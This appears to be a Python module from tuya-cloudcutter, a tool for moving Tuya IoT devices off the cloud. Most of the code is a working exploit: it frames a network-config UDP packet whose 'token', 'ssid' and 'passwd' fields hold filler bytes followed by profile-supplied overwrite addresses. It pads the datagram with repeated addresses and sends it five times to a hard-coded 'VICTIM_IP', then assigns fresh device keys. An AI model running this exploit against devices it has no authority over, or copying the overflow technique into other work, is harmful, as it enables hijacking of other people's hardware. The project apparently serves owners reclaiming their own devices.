tuya-cloudcutter
A tool that disconnects Tuya IoT devices from the cloud, allowing them to run completely locally.
import random
import socket
import string
import struct
import time
import zlib
from distutils.command.config import config
from typing import Dict
from .device import DeviceConfig
# Largest payload (0xE8 = 232 bytes) accepted by build_network_config_packet.
# Together with the 16-byte header and 8-byte trailer packed there, this caps
# a framed packet at 256 bytes.
MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8
# Destination address and UDP port used by send_network_config_datagram.
VICTIM_IP = '192.168.175.1'
VICTIM_PORT = 6669
# Lengths of the random strings generated in create_device_specific_config.
LOCAL_KEY_LENGTH = 16
SEC_KEY_LENGTH = 16
DEVICE_ID_LENGTH = 20
# NOTE(review): not referenced anywhere in the visible part of this file.
PSK_LENGTH = 32
def build_network_config_packet(payload):
    """Frame *payload* as a network-config packet and return the raw bytes.

    The packet is a sequence of big-endian 32-bit fields around the payload:
    head marker (0x55aa), frame number, frame type, length, payload bytes,
    CRC32 of everything before it, and tail marker (0xaa55). The length field
    counts the payload plus the 8-byte trailer (CRC + tail).

    Raises:
        ValueError: if the payload is longer than
            MAX_CONFIG_PACKET_PAYLOAD_LEN bytes.
    """
    if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
        raise ValueError('Payload is too long!')

    # NOTE: the frame number and the CRC do not seem to be used in the
    # disassembly; they are filled in anyway in case they are needed.
    frame_number = 0
    frame_type = 0x1
    trailer_size = 8

    header = struct.pack(
        "!IIII", 0x55aa, frame_number, frame_type, len(payload) + trailer_size
    )
    framed = header + payload
    # The checksum covers the header and the payload, not the trailer itself.
    trailer = struct.pack("!II", zlib.crc32(framed), 0xaa55)
    return framed + trailer
def send_network_config_datagram(datagram):
    """Send *datagram* as one UDP packet to (VICTIM_IP, VICTIM_PORT).

    A fresh IPv4 UDP socket is opened for each call and closed as soon as the
    packet has been handed to the OS, so repeated calls do not leak file
    descriptors.

    Args:
        datagram: the raw bytes to transmit.
    """
    # The context manager closes the socket even if sendto() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client:
        client.sendto(datagram, (VICTIM_IP, VICTIM_PORT))
def encode_json_val(value):
    """Return *value* as bytes with every '"' and '\\' byte backslash-escaped.

    Args:
        value: an iterable of byte values (e.g. a ``bytes`` object).

    Returns:
        A ``bytes`` object in which each double-quote or backslash byte is
        preceded by a backslash byte; all other bytes are copied unchanged.
    """
    backslash = ord('\\')
    needs_escape = [ord('"'), backslash]

    out = []
    for byte in value:
        if byte in needs_escape:
            out.extend((backslash, byte))
        else:
            out.append(byte)
    return bytes(out)
def check_valid_payload(value):
    """Return *value* unchanged after verifying it contains no zero element.

    Args:
        value: an iterable of byte values (e.g. a ``bytes`` object).

    Raises:
        ValueError: if any element of *value* equals 0.
    """
    for element in value:
        if element == 0:
            raise ValueError('At least one null byte detected in payload!')
    return value
def generate_random_ascii_string(length):
    """Return a random string of *length* ASCII letters and digits.

    The strings produced here are stored as device keys (local key, sec key,
    auth key), so the characters are drawn from the operating system's
    entropy source via ``random.SystemRandom`` instead of the module-level
    Mersenne Twister, whose output is predictable and depends on
    ``random.seed``.

    Args:
        length: number of characters to generate.

    Returns:
        A ``str`` of exactly *length* characters from ``[A-Za-z0-9]``.
    """
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.SystemRandom().choices(alphabet, k=length))
def create_device_specific_config(args, combined, uuid, auth_key, psk_key=None) -> DeviceConfig:
    """Build the DeviceConfig describing one exploited device.

    Args:
        args: object exposing ``local_key`` and ``device_id``; an empty value
            for either means a random one is generated instead.
        combined: mapping providing ``["profile"]["firmware"]["chip"]``,
            ``["profile"]["name"]``, ``["profile"]["sub_name"]`` and
            ``["slug"]``.
        uuid: value stored under DeviceConfig.UUID.
        auth_key: value stored under DeviceConfig.AUTH_KEY.
        psk_key: optional value stored under DeviceConfig.PSK; skipped when
            ``None``.

    Returns:
        The populated DeviceConfig.
    """
    device_config = DeviceConfig({})
    device_config.set(DeviceConfig.UUID, uuid)
    device_config.set(DeviceConfig.AUTH_KEY, auth_key)

    # An empty args.local_key falls back to a freshly generated key.
    if len(args.local_key) == 0:
        local_key = generate_random_ascii_string(LOCAL_KEY_LENGTH)
    else:
        local_key = args.local_key
    device_config.set(DeviceConfig.LOCAL_KEY, local_key)

    # The sec key is always random; there is no override for it.
    sec_key = generate_random_ascii_string(SEC_KEY_LENGTH)
    device_config.set(DeviceConfig.SEC_KEY, sec_key)

    # Same fallback rule as the local key.
    if len(args.device_id) == 0:
        device_id = generate_random_ascii_string(DEVICE_ID_LENGTH)
    else:
        device_id = args.device_id
    device_config.set(DeviceConfig.DEVICE_ID, device_id)

    profile = combined["profile"]
    device_config.set(DeviceConfig.CHIP_FAMILY, profile['firmware']['chip'].upper())
    device_config.set(DeviceConfig.PROFILE, profile["name"] + " / " + profile["sub_name"])
    device_config.set(DeviceConfig.DEVICE, combined['slug'])

    if psk_key is not None:
        device_config.set(DeviceConfig.PSK, psk_key)
    return device_config
def exploit_device_with_config(args, combined: Dict) -> DeviceConfig:
    """Build the config datagram for a device profile, send it, and return
    the matching DeviceConfig.

    The addresses are read from ``combined["profile"]["data"]`` as integer
    strings (any base accepted by ``int(x, 0)``) and serialised little-endian.
    A JSON-like object carrying a random uuid/auth key plus those addresses
    is framed with build_network_config_packet, padded to 256 bytes, and sent
    five times, 200 ms apart.

    Args:
        args: passed through to create_device_specific_config.
        combined: mapping holding the device profile.

    Returns:
        The DeviceConfig built from the generated uuid and auth key.

    Raises:
        ValueError: if the serialised payload contains a null byte or is too
            long for a config packet.
    """
    profile_data = combined["profile"]["data"]

    def read_address(key, width):
        # Base 0 lets int() accept "0x..." strings as well as decimal ones.
        number = int(profile_data.get(key, "0"), 0)
        return number.to_bytes(byteorder="little", length=width)

    # Trailing zero bytes are stripped from the 3-byte addresses; a missing
    # (zero) address therefore collapses to b"" and is treated as absent.
    finish_addr = read_address("address_finish", 3).rstrip(b"\x00")
    ssid_addr = read_address("address_ssid", 3).rstrip(b"\x00")
    ssid_padding = int(profile_data.get("address_ssid_padding", 4))
    passwd_addr = read_address("address_passwd", 3).rstrip(b"\x00")
    datagram_addr = read_address("address_datagram", 4)

    uuid = generate_random_ascii_string(12)
    auth_key = generate_random_ascii_string(16)

    fields = {
        "auzkey": auth_key,
        "uuid": uuid,
        "pskKey": "",
        "prod_test": False,
        "ap_ssid": "A",
        "ssid": "A",
        "token": b"A" * 72 + finish_addr,
    }
    if ssid_addr:
        # A padding of 0 falls back to the default of 4 filler bytes.
        fields["ssid"] = b"A" * (ssid_padding or 4) + ssid_addr
    if passwd_addr:
        fields["passwd"] = passwd_addr

    def render(value):
        # bytes and str become quoted strings; booleans become JSON literals.
        if isinstance(value, bytes):
            return b'"' + value + b'"'
        if isinstance(value, bool):
            return b'true' if value else b'false'
        return b'"' + value.encode() + b'"'

    members = [
        f'"{key}":'.encode() + render(value) for key, value in fields.items()
    ]
    body = check_valid_payload(b"{" + b",".join(members) + b"}")
    datagram = build_network_config_packet(body)

    # NOTE(review): datagram_addr is always 4 bytes long (it is not stripped),
    # so this condition holds even when the profile has no address_datagram.
    if datagram_addr:
        # Fill up to 256 bytes: filler bytes first so the repeated 4-byte
        # address ends exactly at the end of the datagram.
        repeats, filler = divmod(256 - len(datagram), 4)
        datagram += b"A" * filler
        datagram += datagram_addr * repeats
        assert len(datagram) == 256

    attempts = 5
    for _ in range(attempts):
        send_network_config_datagram(datagram)
        time.sleep(.200)

    return create_device_specific_config(args, combined, uuid, auth_key)